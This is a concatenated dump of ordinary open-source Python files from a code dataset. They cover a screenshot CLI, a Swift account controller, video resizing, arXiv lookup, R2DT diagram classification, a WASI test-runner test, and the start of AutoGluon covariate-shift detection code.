page.goto(website)\r\n time.sleep(delay)\r\n page.screenshot(\r\n full_page=full,\r\n timeout=15 * 1000,\r\n type=\"png\",\r\n path=f\"screenshots/{secrets.token_urlsafe(8)}.png\",\r\n )\r\n print(\"Screenshot saved.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n \"--website\", \"-w\", required=True, help=\"The website to take a screenshot of\"\r\n )\r\n parser.add_argument(\r\n \"--delay\",\r\n \"-d\",\r\n required=False,\r\n help=\"How long to wait before taking the screenshot (seconds)\",\r\n type=int,\r\n default=0,\r\n )\r\n parser.add_argument(\r\n \"--headless\",\r\n required=False,\r\n help=\"If the process should be headless or not\",\r\n default=True,\r\n type=bool,\r\n )\r\n parser.add_argument(\r\n \"--full_page\",\r\n \"-fp\",\r\n required=False,\r\n help=\"If the screenshot should be of the full page\",\r\n default=False,\r\n type=bool,\r\n )\r\n ParsedArgs = parser.parse_args()\r\n screenshot(\r\n website=ParsedArgs.website,\r\n headless=ParsedArgs.headless,\r\n delay=ParsedArgs.delay,\r\n full=ParsedArgs.full_page,\r\n )\r\n","repo_name":"curiositIy/screenshot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19516100388","text":"from urllib import unquote\n\nfrom swift.account.utils import account_listing_response, \\\n account_listing_content_type\nfrom swift.common.utils import public\nfrom swift.common.constraints import check_metadata, MAX_ACCOUNT_NAME_LENGTH\nfrom swift.common.http import HTTP_NOT_FOUND\nfrom swift.proxy.controllers.base import Controller, clear_info_cache\nfrom swift.common.swob import HTTPBadRequest, HTTPMethodNotAllowed\n\n\nclass AccountController(Controller):\n \"\"\"WSGI controller for account requests\"\"\"\n server_type = 'Account'\n\n def __init__(self, app, account_name, **kwargs):\n Controller.__init__(self, app)\n self.account_name = unquote(account_name)\n if not self.app.allow_account_management:\n self.allowed_methods.remove('PUT')\n self.allowed_methods.remove('DELETE')\n\n def GETorHEAD(self, req):\n \"\"\"Handler for HTTP GET/HEAD requests.\"\"\"\n if len(self.account_name) > MAX_ACCOUNT_NAME_LENGTH:\n resp = HTTPBadRequest(request=req)\n resp.body = 'Account name length of %d longer than %d' % \\\n (len(self.account_name), MAX_ACCOUNT_NAME_LENGTH)\n return resp\n\n partition, nodes = self.app.account_ring.get_nodes(self.account_name)\n resp = self.GETorHEAD_base(\n req, _('Account'), self.app.account_ring, partition,\n req.path_info.rstrip('/'))\n if resp.status_int == HTTP_NOT_FOUND and self.app.account_autocreate:\n content_type, error = account_listing_content_type(req)\n if error:\n return error\n return account_listing_response(self.account_name, req,\n content_type)\n return resp\n\n @public\n def PUT(self, req):\n \"\"\"HTTP PUT request handler.\"\"\"\n if not self.app.allow_account_management:\n return HTTPMethodNotAllowed(\n request=req,\n headers={'Allow': ', '.join(self.allowed_methods)})\n error_response = check_metadata(req, 'account')\n if error_response:\n return error_response\n if len(self.account_name) > MAX_ACCOUNT_NAME_LENGTH:\n resp = HTTPBadRequest(request=req)\n resp.body = 'Account name length of %d longer than %d' % \\\n (len(self.account_name), MAX_ACCOUNT_NAME_LENGTH)\n return resp\n account_partition, accounts = \\\n self.app.account_ring.get_nodes(self.account_name)\n headers = self.generate_request_headers(req, transfer=True)\n clear_info_cache(self.app, req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'PUT',\n req.path_info, [headers] * len(accounts))\n return resp\n\n @public\n def POST(self, req):\n \"\"\"HTTP POST request handler.\"\"\"\n if len(self.account_name) > MAX_ACCOUNT_NAME_LENGTH:\n resp = HTTPBadRequest(request=req)\n resp.body = 'Account name length of %d longer than %d' % \\\n (len(self.account_name), MAX_ACCOUNT_NAME_LENGTH)\n return resp\n error_response = check_metadata(req, 'account')\n if error_response:\n return error_response\n account_partition, accounts = \\\n self.app.account_ring.get_nodes(self.account_name)\n headers = self.generate_request_headers(req, transfer=True)\n clear_info_cache(self.app, req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'POST',\n req.path_info, [headers] * len(accounts))\n if resp.status_int == HTTP_NOT_FOUND and self.app.account_autocreate:\n self.autocreate_account(req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'POST',\n req.path_info, [headers] * len(accounts))\n return resp\n\n @public\n def DELETE(self, req):\n \"\"\"HTTP DELETE request handler.\"\"\"\n # Extra safety in case someone typos a query string for an\n # account-level DELETE request that was really meant to be caught by\n # some middleware.\n if req.query_string:\n return HTTPBadRequest(request=req)\n if not self.app.allow_account_management:\n return HTTPMethodNotAllowed(\n request=req,\n headers={'Allow': ', '.join(self.allowed_methods)})\n account_partition, accounts = \\\n self.app.account_ring.get_nodes(self.account_name)\n headers = self.generate_request_headers(req)\n clear_info_cache(self.app, req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'DELETE',\n req.path_info, [headers] * len(accounts))\n return resp\n","repo_name":"zaitcev/swift-lfs","sub_path":"swift/proxy/controllers/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"9196461460","text":"import sys\nimport collections\nif sys.version_info < (3, 3):\n Iterable = collections.Iterable\nelse:\n Iterable = collections.abc.Iterable\n\nimport cv2\nimport numpy as np\n\nfrom .blob import _is_varray\n\ndef resize(varray, size, interpolation=cv2.INTER_LINEAR):\n \"\"\"resize a video via OpenCV\"s resize API\n NOTE: Currently, we only support spatial resize.\n \"\"\"\n if not _is_varray(varray):\n raise TypeError('varray should be ndarray. Got {}'.format(varray))\n t, h, w, c = varray.shape\n\n oh = None\n ow = None\n if isinstance(size, int):\n ## short path\n if (w <= h and w == size) or (h <= w and h == size):\n return varray \n if w < h:\n ow = size\n oh = int(size * h / w)\n else:\n oh = size\n ow = int(size * w / h)\n elif isinstance(size, Iterable) and (len(size) == 2):\n oh, ow = tuple(size)\n else:\n raise TypeError(\"Invalid size {}\".format(size))\n\n _shape = (t, oh, ow, c)\n result = np.empty(_shape, dtype=np.uint8)\n for _i in range(t):\n farray = varray[_i, :, :, :]\n farray = cv2.resize(farray, dsize=(ow, oh),\n interpolation=interpolation)\n result[_i, :, :, :] = farray\n return result\n","repo_name":"SaltedFishLZ/torchstream","sub_path":"torchstream/transforms/functional/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"28902626661","text":"#!/usr/bin/python3\n\nimport sys\nimport string\nimport itertools\nimport pickle\n\nfrom helper import classify\n\n\nif len(sys.argv) == 1:\n print(\"Usage: python \" + sys.argv[0] + \" letters num\")\n print(\"E.g: python \" + sys.argv[0] + \" apelp 4\")\n exit(0)\n\nmapping = pickle.load(open(\"words_mapping.p\", \"rb\"))\n\ncombinations = map(''.join, list(\n itertools.combinations(sys.argv[1], int(sys.argv[2]))))\n\nanswer = set()\nfor combo in combinations:\n category = classify(combo)\n if category in mapping:\n for word in mapping[category]:\n answer.add(word)\nprint(sorted(list(answer)))\n","repo_name":"fredwangwang/solve-word-cookies","sub_path":"test_words.py","file_name":"test_words.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18357132799","text":"from collections import Counter\n\nn = int(input())\nS = [''.join(sorted(input())) for _ in range(n)]\nS_c = Counter(S)\n\nans = 0\nfor i in list(S_c.values()):\n ans += i * (i - 1) // 2\n\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02947/s947659341.py","file_name":"s947659341.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18064571089","text":"s = input()\nli = [[1, 1, 0, 0], [0, 0, 1, 1], [1, 1, 1, 1]]\n\ndirection = [0] * 4\n\nfor i in s:\n if i == 'N':\n direction[0] = 1\n elif i == 'S':\n direction[1] = 1\n elif i == 'W':\n direction[2] = 1\n else:\n direction[3] = 1\n\nif direction in li:\n print('Yes')\nelse:\n print('No')","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p04019/s549129239.py","file_name":"s549129239.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"23192571807","text":"from __future__ import unicode_literals, print_function, absolute_import\nfrom builtins import input\nimport feedparser\nfrom doi2bib.crossref import get_bib_from_doi\nfrom bibtexparser.bwriter import BibTexWriter\nfrom bibtexparser.bibdatabase import BibDatabase\ntry:\n from urllib import quote\nexcept ImportError:\n from urllib.parse import quote\nimport re\nfrom unidecode import unidecode\n\nimport requests\nfrom arxivcheck.wrapper_graphQL import *\n\nmonths = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct',\n'nov', 'dec']\n\n\ndef ask_which_is(title, items):\n found = False\n result = {}\n question = \"\\n\\tArxiv:{} \\n\\tIt is \\n\\t{}\\n\\t Correct?y(yes)|n(no)|q(quit)\"\n for item in items:\n w = input(question.format(\n unidecode(item[\"title\"]), unidecode(title)))\n if w == \"y\":\n found = True\n result = item\n break\n if w == \"q\":\n break\n return found, result\n\n\ndef get_arxiv_info(value, field=\"id\"):\n \n result = arxiv_info(value, field)\n\n found = False\n items = []\n\n if field == \"id\" and result[\"data\"][\"entry\"] != None:\n items = result[\"data\"][\"entry\"]\n found = True\n elif field == \"ti\" and result[\"data\"][\"entries\"]:\n items = result[\"data\"][\"entries\"]\n found = True\n else:\n items = [] \n\n\n return found, items\n\n\ndef generate_bib_from_arxiv(arxiv_item, value, field=\"id\"):\n # arxiv_cat = arxiv_item.arxiv_primary_category[\"term\"]\n if field == \"ti\":\n journal = \"arxiv:\"+arxiv_item[\"id\"].split(\"http://arxiv.org/abs/\")[1]\n else:\n journal = \"arxiv:\"+value\n\n url = arxiv_item[\"pdfUrl\"]\n title = arxiv_item[\"title\"]\n authors = arxiv_item[\"authors\"]\n if len(authors) > 0:\n first_author = authors[0].split(\" \")\n authors = \" and \".join([author for author in authors])\n else:\n first_author = authors\n authors = authors\n\n published = arxiv_item[\"published\"].split(\"-\")\n year = ''\n if len(published) > 1:\n year = published[0]\n bib = BibDatabase()\n bib.entries = [\n {\n \"journal\": journal,\n \"url\": url,\n \"ID\": year+first_author[0]+journal,\n \"title\": title,\n \"year\": year,\n \"author\": authors,\n \"ENTRYTYPE\": \"article\"\n }\n ]\n bib = BibTexWriter().write(bib)\n return bib\n\n\ndef get_arxiv_pdf_link(value, field=\"id\"):\n found, items = get_arxiv_info(value, field)\n if found:\n link = items[0][\"pdfUrl\"]\n\n return found, link\n\n\ndef check_arxiv_published(value, field=\"id\", get_first=True):\n found = False\n published = False\n bib = \"\"\n value = re.sub(\"arxiv\\:\", \"\", value, flags=re.I)\n found, items = get_arxiv_info(value, field)\n if found:\n if get_first is False and field == \"ti\" and len(items) > 1:\n found, item = ask_which_is(value, items)\n else:\n item = items[0]\n if found:\n if item[\"doi\"] != None:\n doi = item[\"doi\"]\n published, bib = get_bib_from_doi(doi)\n else:\n bib = generate_bib_from_arxiv(item, value, field)\n else:\n print(\"\\t\\nArxiv not found.\")\n return found, published, bib\n","repo_name":"gleisonbt/migrating-to-graphql","sub_path":"migration_study/arxivcheck/arxivcheck/arxiv.py","file_name":"arxiv.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"16910659776","text":"from smsh.target.target import Target\nfrom smsh import clients\n\n\nclass Instance(Target):\n DEFAULT_EXECUTION_TIMEOUT = \"900\"\n DEFAULT_DOCUMENT = \"AWS-RunShellScript\"\n\n def __init__(self, instance_id):\n Target.__init__(self, instance_id)\n\n def send_command(self, wd, command):\n client = clients.SSM()\n resp = client.send_command(\n InstanceIds=[\n self.get_instance_id()\n ],\n DocumentName=self.DEFAULT_DOCUMENT,\n Parameters={\n \"workingDirectory\": [wd],\n \"commands\": [command],\n \"executionTimeout\": [self.DEFAULT_EXECUTION_TIMEOUT]\n }\n )\n return resp.get(\"Command\", {}).get(\"CommandId\")\n","repo_name":"mnesbitt/smsh","sub_path":"smsh/target/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"13094520933","text":"from typing import Any\nfrom unittest.mock import ANY, MagicMock, Mock, patch, mock_open\n\nimport wasi_test_runner.test_case as tc\nimport wasi_test_runner.test_suite_runner as tsr\n\n\ndef get_mock_open() -> Mock:\n def open_mock(filename: str, *_args: Any, **_kwargs: Any) -> Any:\n file_content = {\n \"my-path/manifest.json\": '{\"name\": \"test-suite\"}',\n \"test1.json\": '{\"dirs\": [\".\", \"deep/dir\"]}',\n \"test2.json\": '{\"exit_code\": 1, \"args\": [\"a\", \"b\"]}',\n \"test3.json\": '{\"stdout\": \"output\", \"env\": {\"x\": \"1\"}}',\n }\n if filename in file_content:\n return mock_open(read_data=file_content[filename]).return_value\n\n raise FileNotFoundError(f\"(mock) Unable to open {filename}\")\n\n return MagicMock(side_effect=open_mock)\n\n\n# pylint: disable-msg=too-many-locals\n@patch(\"builtins.open\", get_mock_open())\n@patch(\"os.path.exists\", Mock(return_value=True))\ndef test_runner_end_to_end() -> None:\n test_paths = [\"test1.wasm\", \"test2.wasm\", \"test3.wasm\"]\n\n failures = [tc.Failure(\"a\", \"b\"), tc.Failure(\"x\", \"y\"), tc.Failure(\"x\", \"z\")]\n\n outputs = [\n tc.Output(0, \"test1\", \"\"),\n tc.Output(1, \"test2\", \"\"),\n tc.Output(2, \"test3\", \"\"),\n ]\n expected_results = [\n tc.Result(outputs[0], True, []),\n tc.Result(outputs[1], True, [failures[1]]),\n tc.Result(outputs[2], True, [failures[0], failures[2]]),\n ]\n expected_config = [\n tc.Config(dirs=[\".\", \"deep/dir\"]),\n tc.Config(args=[\"a\", \"b\"], exit_code=1),\n tc.Config(stdout=\"output\", env={\"x\": \"1\"}),\n ]\n\n expected_test_cases = [\n tc.TestCase(test_name, config, result, ANY)\n for config, test_name, result in zip(\n expected_config, [\"test1\", \"test2\", \"test3\"], expected_results\n )\n ]\n\n runtime = Mock()\n runtime.run_test.side_effect = outputs\n\n validators = [\n Mock(side_effect=[None, None, failures[0]]),\n Mock(side_effect=[None, failures[1], failures[2]]),\n ]\n\n reporters = [Mock(), Mock()]\n\n filt = Mock()\n filt.should_skip.return_value = (False, None)\n filters = [filt]\n\n with patch(\"glob.glob\", return_value=test_paths):\n suite = tsr.run_tests_from_test_suite(\"my-path\", runtime, validators, reporters, filters) # type: ignore\n\n # Assert manifest was read correctly\n assert suite.name == \"test-suite\"\n\n # Assert test cases\n assert suite.test_count == 3\n assert suite.test_cases == expected_test_cases\n\n # Assert test runner calls\n assert runtime.run_test.call_count == 3\n for test_path, config in zip(test_paths, expected_config):\n runtime.run_test.assert_any_call(\n test_path, config.args, config.env, config.dirs\n )\n\n # Assert reporters calls\n for reporter in reporters:\n assert reporter.report_test.call_count == 3\n for test_case in expected_test_cases:\n reporter.report_test.assert_any_call(test_case)\n\n # Assert validators calls\n for validator in validators:\n assert validator.call_count == 3\n for config, output in zip(expected_config, outputs):\n validator.assert_any_call(config, output)\n\n # Assert filter calls\n for filt in filters:\n assert filt.should_skip.call_count == 3\n for test_case in expected_test_cases:\n filt.should_skip.assert_any_call(suite.name, test_case.name)\n\n\n@patch(\"os.path.exists\", Mock(return_value=False))\ndef test_runner_should_use_path_for_name_if_manifest_does_not_exist() -> None:\n suite = tsr.run_tests_from_test_suite(\"my-path\", Mock(), [], [], [])\n\n assert suite.name == \"my-path\"\n","repo_name":"WebAssembly/wasi-testsuite","sub_path":"test-runner/tests/test_test_suite_runner.py","file_name":"test_test_suite_runner.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"65"} +{"seq_id":"11047177930","text":"import csv\nimport enum\nimport logging\nimport typing as ty\nfrom pathlib import Path\n\nimport joblib\nimport pandas as pd\nimport psycopg2\nimport psycopg2.extras\nfrom more_itertools import chunked\nfrom pypika import Query, Table\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split\n\nLOGGER = logging.getLogger(__name__)\n\n\nSOURCE_MAP = {\n \"crw\": 0,\n \"ribovision\": 1,\n \"gtrnadb\": 2,\n \"rnase_p\": 3,\n \"rfam\": 4,\n}\n\n\n@enum.unique\nclass Attributes(enum.Enum):\n SourceIndex = \"source_index\"\n SequenceLength = \"sequence_length\"\n DiagramSequenceLength = \"diagram_sequence_length\"\n ModelLength = \"model_length\"\n ModelBasepairCount = \"model_basepair_count\"\n DiagramBps = \"diagram_bps\"\n DiagramModelLength = \"diagram_model_length\"\n DiagramOverlapCount = \"diagram_overlap_count\"\n\n @classmethod\n def model_columns(cls) -> ty.List[str]:\n return [attr.column_name() for attr in cls]\n\n def column_name(self) -> str:\n return self.value\n\n\nMODEL_COLUMNS: ty.List[str] = Attributes.model_columns()\n\n\ndef chunked_query(\n ids: ty.Iterable[str], query_builder, db_url: str, chunk_size=100\n) -> ty.Iterable[ty.Dict[str, ty.Any]]:\n conn = psycopg2.connect(db_url)\n for chunk in chunked(ids, chunk_size):\n sql = str(query_builder(chunk))\n with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:\n cur.execute(sql)\n for result in cur:\n yield dict(result)\n\n\ndef fetch_modeled_data(\n all_ids: ty.Iterable[str], db_url: str, chunk_size=100\n) -> ty.Iterable[ty.Dict[str, ty.Any]]:\n rna = Table(\"rna\")\n ss = Table(\"rnc_secondary_structure_layout\")\n sm = Table(\"rnc_secondary_structure_layout_models\")\n\n def build_query(ids):\n return (\n Query.from_(rna)\n .select(\n rna.upi.as_(\"urs\"),\n rna.len.as_(\"sequence_length\"),\n sm.model_source,\n ss.sequence_start.as_(\"diagram_sequence_start\"),\n ss.sequence_stop.as_(\"diagram_sequence_stop\"),\n ss.basepair_count.as_(\"diagram_bps\"),\n ss.model_start.as_(\"diagram_model_start\"),\n ss.model_stop.as_(\"diagram_model_stop\"),\n sm.model_length,\n sm.model_basepair_count,\n ss.overlap_count.as_(\"diagram_overlap_count\"),\n )\n .join(ss)\n .on(ss.urs == rna.upi)\n .join(sm)\n .on(sm.id == ss.model_id)\n .where(ss.urs.isin(ids))\n )\n\n seen: ty.Set[str] = set()\n results = chunked_query(all_ids, build_query, db_url, chunk_size=chunk_size)\n for result in results:\n if any(v is None for v in result.values()):\n continue\n yield result\n seen.add(result[\"urs\"])\n\n for urs in all_ids:\n if urs not in seen:\n LOGGER.warn(\"Missed loading %s\", urs)\n\n\ndef infer_columns(frame: pd.DataFrame):\n frame[\"diagram_sequence_length\"] = (\n frame[\"diagram_sequence_stop\"] - frame[\"diagram_sequence_start\"]\n )\n frame[\"diagram_model_length\"] = (\n frame[\"diagram_model_stop\"] - frame[\"diagram_model_start\"]\n )\n frame[\"source_index\"] = frame.model_source.map(SOURCE_MAP)\n if frame[\"source_index\"].isnull().any():\n raise ValueError(\"Could not build source_index for all training data\")\n\n\ndef fetch_training_data(handle: ty.IO, db_url: str) -> pd.DataFrame:\n ids = []\n training = {}\n for (urs, flag) in csv.reader(handle):\n ids.append(urs)\n if flag == \"1\":\n training[urs] = True\n elif flag == \"0\":\n training[urs] = False\n else:\n raise ValueError(f\"Unknown flag {flag}\")\n\n filled = []\n for metadata in fetch_modeled_data(ids, db_url):\n urs = metadata[\"urs\"]\n if urs not in training:\n raise ValueError(f\"Got an extra entry, somehow {metadata}\")\n metadata[\"valid\"] = training[urs]\n filled.append(metadata)\n\n training = pd.DataFrame.from_records(filled)\n infer_columns(training)\n return training\n\n\ndef train(handle, db_url, cross_validation=5, test_size=0.4) -> RandomForestClassifier:\n data = fetch_training_data(handle, db_url)\n X_train, X_test, y_train, y_test = train_test_split(\n data[MODEL_COLUMNS].to_numpy(), data[\"valid\"].to_numpy(), test_size=test_size\n )\n\n clf = RandomForestClassifier(min_samples_split=5)\n scores = cross_val_score(clf, X_train, y_train, cv=cross_validation)\n LOGGER.info(\"%s fold cross validation scores: %s\", cross_validation, scores)\n clf.fit(X_train, y_train)\n LOGGER.info(\"Test data (%f) scoring %s\", test_size, clf.score(X_test, y_test))\n return clf\n\n\ndef from_result(clf, result) -> bool:\n predictable = {}\n for attribute in Attributes:\n value = attribute.r2dt_result_value(result)\n predictable[attribute.column_name()] = [value]\n predictable = pd.DataFrame.from_records(predictable)\n return clf.predict(predictable)[0]\n\n\ndef write(model_path: Path, handle: ty.IO, db_url: str, output: ty.IO):\n model = joblib.load(model_path)\n ids = [r[0] for r in csv.reader(handle)]\n modeled = fetch_modeled_data(ids, db_url)\n frame = pd.DataFrame.from_records(modeled)\n if len(frame) > 0:\n infer_columns(frame)\n predicted = model.predict(frame[MODEL_COLUMNS].to_numpy())\n to_write = pd.DataFrame()\n to_write[\"urs\"] = frame[\"urs\"]\n to_write[\"should_show\"] = predicted.astype(int)\n to_write.to_csv(output, index=False)\n\n\ndef write_model(handle: ty.IO, db_url: str, output: Path):\n joblib.dump(train(handle, db_url), output)\n\n\ndef write_training_data(handle: ty.IO, db_url: str, output: ty.IO):\n ids = []\n for row in csv.reader(handle):\n ids.append(row[0])\n modeled = list(fetch_modeled_data(ids, db_url))\n writer = csv.DictWriter(output, fieldnames=modeled[0].keys())\n writer.writeheader()\n writer.writerows(modeled)\n\n\ndef convert_sheet(handle: ty.IO, output: ty.IO):\n converted = []\n for row in csv.DictReader(handle):\n urs = row[\"urs\"]\n raw_should_show = row[\"Labeled Should show\"]\n if not raw_should_show:\n LOGGER.info(\"No value for %s\", urs)\n\n should_show = None\n raw_should_show = raw_should_show.lower()\n if raw_should_show == \"true\":\n should_show = \"1\"\n elif raw_should_show == \"false\":\n should_show = \"0\"\n else:\n LOGGER.warn(\"Unknown should show in %s\", row)\n continue\n converted.append((urs, should_show))\n converted.sort(key=lambda r: r[0])\n writer = csv.writer(output)\n writer.writerows(converted)\n\n\ndef inspect_data(data, db_url: str) -> ty.Iterable[ty.Dict[str, ty.Any]]:\n def build_query(ids):\n ss = Table(\"rnc_secondary_structure_layout\")\n sm = Table(\"rnc_secondary_structure_layout_models\")\n pre = Table(\"rnc_rna_precomputed\")\n return (\n Query.from_(ss)\n .join(sm)\n .on(sm.id == ss.model_id)\n .join(pre)\n .on(pre.urs == sm.urs)\n .select(\n sm.model_source,\n sm.model_name,\n sm.model_so_term,\n )\n .where(ss.urs.isin(ids))\n .where(pre.taxid.isnotnull)\n )\n\n mapping = {d[0]: d for d in data}\n seen: ty.Set[str] = set()\n results = chunked_query(data, build_query, db_url)\n for result in results:\n if any(v is None for v in result.values()):\n continue\n yield {\n \"urs\": result[\"urs\"],\n \"link\": f\"https://rnacentral.org/rna/{result['urs']}\",\n \"model_source\": result[\"model_source\"],\n \"model_name\": result[\"model_name\"],\n \"model_so_term\": result[\"model_so_term\"],\n \"Labeled Should show\": result[\"urs\"],\n }\n seen.add(result[\"urs\"])\n\n for urs in mapping.keys():\n if urs not in seen:\n LOGGER.warn(\"Missed loading %s\", urs)\n\n\ndef write_inspect_data(handle: ty.IO, db_url: str, output: ty.IO):\n data = list(csv.reader(handle))\n inspect = list(inspect_data(data, db_url))\n writer = csv.DictWriter(output, fieldnames=inspect[0].keys())\n writer.writeheader()\n writer.writerows(inspect)\n","repo_name":"RNAcentral/rnacentral-import-pipeline","sub_path":"rnacentral_pipeline/rnacentral/r2dt/should_show.py","file_name":"should_show.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"71343314767","text":"from typing import Union, List, Any, Optional\nimport warnings\nimport pandas as pd\nimport numpy as np\nfrom autogluon.core.metrics import balanced_accuracy, BINARY_METRICS\nfrom autogluon.tabular import TabularPredictor\nfrom .. import AnalysisState\nfrom .base import AbstractAnalysis\n\n\ndef post_fit(func):\n \"\"\"decorator for post-fit methods\"\"\"\n\n def pff_wrapper(self, *args, **kwargs):\n assert self._is_fit, f'.fit needs to be called prior to .{func.__name__}'\n return func(self, *args, **kwargs)\n\n return pff_wrapper\n\nclass Classifier2ST:\n \"\"\"A classifier 2 sample test, which tests for a difference between a source and target dataset. It fits a\n classifier to predict if a sample is in the source and target dataset, then computes an evaluation metric on a\n holdout which becomes the test statistic.\n\n Parameters\n ----------\n classifier_class : an AutoGluon predictor, such as autogluon.tabular.TabularPredictor\n The predictor (classifier) class to classify the source from target dataset, predictor class needs to support\n binary classification\n sample_label : str, default = 'xshift_label'\n The label that will be used to indicate if the sample is from training or test\n eval_metric : callable, default = autogluon.core.metrics.balanced_accuracy\n Binary classification metric to use for the classifier 2 sample test\n split : float, default = 0.5\n Training/test split proportion for classifier 2 sample test\n classifier_kwargs : dict, default = {}\n The kwargs passed to the classifier, a member of classifier_class\n \"\"\"\n def __init__(self,\n classifier_class,\n sample_label='xshift_label',\n eval_metric=balanced_accuracy,\n split=0.5,\n compute_fi = True,\n classifier_kwargs = {}\n ):\n classifier_kwargs.update({'label': sample_label, 'eval_metric': eval_metric})\n self.classifier = classifier_class(**classifier_kwargs)\n self.classifier_class = classifier_class\n self.split = split\n self.sample_label = sample_label\n self.eval_metric = eval_metric\n self._is_fit = False\n self._test = None\n self.test_stat = None\n self.has_fi = None\n self.compute_fi = compute_fi\n\n @staticmethod\n def _make_source_target_label(data, sample_label):\n \"\"\"Turn a source, target pair into a single dataframe with label column\"\"\"\n source, target = data[0].copy(), data[1].copy()\n source.loc[:,sample_label] = 0\n target.loc[:,sample_label] = 1\n data = pd.concat((source, target))\n return data\n\n def fit(self, data, **kwargs):\n \"\"\"Fit the classifier for predicting if source or target and compute the 2-sample test statistic.\n\n Parameters\n ----------\n data : pd.DataFrame, or tuple\n either\n - a dataframe with a label column where 1 = target and 0 = source\n - a tuple of source dataframe and target dataframe\n \"\"\"\n if isinstance(data, pd.DataFrame):\n sample_label = self.sample_label\n assert sample_label in data.columns, \"sample_label needs to be a column of data\"\n assert self.split, \"sample_label requires the split parameter\"\n data = data.copy() # makes a copy\n else:\n assert len(data) == 2, \"Data needs to be tuple/list of (source, target) if sample_label is None\"\n data = self._make_source_target_label(data, self.sample_label) # makes a copy\n if data.index.has_duplicates:\n data.index = pd.RangeIndex(data.shape[0])\n train = data.sample(frac=self.split)\n test = data.drop(train.index)\n self.classifier.fit(train, **kwargs)\n yhat = self.classifier.predict(test)\n self.test_stat = self.eval_metric(test[self.sample_label], yhat)\n self.has_fi = (getattr(self.classifier, \"feature_importance\", None) is not None)\n if self.has_fi and self.compute_fi:\n self._test = test # for feature importance\n self._is_fit = True\n\n @post_fit\n def _pvalue_half_permutation(self,\n num_permutations=1000):\n \"\"\"The half permutation method for computing p-values.\n See Section 9.1 of https://arxiv.org/pdf/1602.02210.pdf\n \"\"\"\n perm_stats = [self.test_stat]\n yhat = self.classifier.predict(self._test)\n for i in range(num_permutations):\n perm_yhat = np.random.permutation(yhat)\n perm_test_stat = self.eval_metric(\n self._test[self.sample_label],\n perm_yhat\n )\n perm_stats.append(perm_test_stat)\n pval = (self.test_stat <= np.array(perm_stats)).mean()\n return pval\n\n @post_fit\n def pvalue(self,\n num_permutations: int=1000):\n \"\"\"Compute the p-value which measures the significance level for the test statistic\n\n Parameters\n ----------\n num_permutations: int, default = 1000\n The number of permutations used for any permutation based method\n\n Returns\n -------\n float of the p-value for the 2-sample test\n \"\"\"\n pval = self._pvalue_half_permutation(num_permutations=num_permutations)\n return pval\n\n @post_fit\n def feature_importance(self):\n \"\"\"Returns the feature importances for the trained classifier for source v. target\n\n Returns\n -------\n pd.DataFrame of feature importances\n \"\"\"\n assert self.has_fi, \"Classifier class does not have feature_importance method\"\n assert self.compute_fi, \"Set compute_fi to True to compute feature importances\"\n fi_scores = self.classifier.feature_importance(self._test)\n return fi_scores\n\n\nclass C2STShiftDetector:\n \"\"\"Detect a change in covariate (X) distribution between training and test, which we call XShift. It can tell you\n if your training set is not representative of your test set distribution. This is done with a Classifier 2\n Sample Test.\n\n Parameters\n ----------\n classifier_class : an AutoGluon predictor, such as autogluon.tabular.TabularPredictor\n The predictor that will be fit on training set and predict the test set\n label : str, default = None\n The Y variable that is to be predicted (if it appears in the train/test data then it will be removed)\n compute_fi : bool, default = True\n To compute the feature importances set to True, this can be computationally intensive\n pvalue_thresh : float, default = 0.01\n The threshold for the pvalue\n eval_metric : str, default = 'balanced_accuracy'\n The metric used for the C2ST, it must be one of the binary metrics from autogluon.core.metrics\n sample_label : str, default = 'i2vkyc0p64'\n The label internally used for the classifier 2 sample test, the only reason to change it is in the off chance\n that the default value is a column in the data.\n classifier_kwargs : dict, default = {}\n The kwargs passed to the classifier, a member of classifier_class\n\n Methods\n -------\n fit : fits the detector on training and test covariate data\n results: outputs the results of XShift detection\n - test statistic\n - detection status\n - p-value\n - detector feature importances\n decision: decision function ('detected' or 'not detected')\n pvalue: a p-value for the two sample test\n\n Usage\n -----\n >>> xshiftd = C2STShiftDetector(TabularPredictor, label='class')\n Fit the detector...\n >>> xshiftd.fit(X, X_test)\n Output the decision...\n >>> xshiftd.decision()\n Output the results...\n >>> xshiftd.results()\n \"\"\"\n\n def __init__(self,\n classifier_class: Any,\n label: Optional[str]=None,\n compute_fi: bool = True,\n pvalue_thresh : 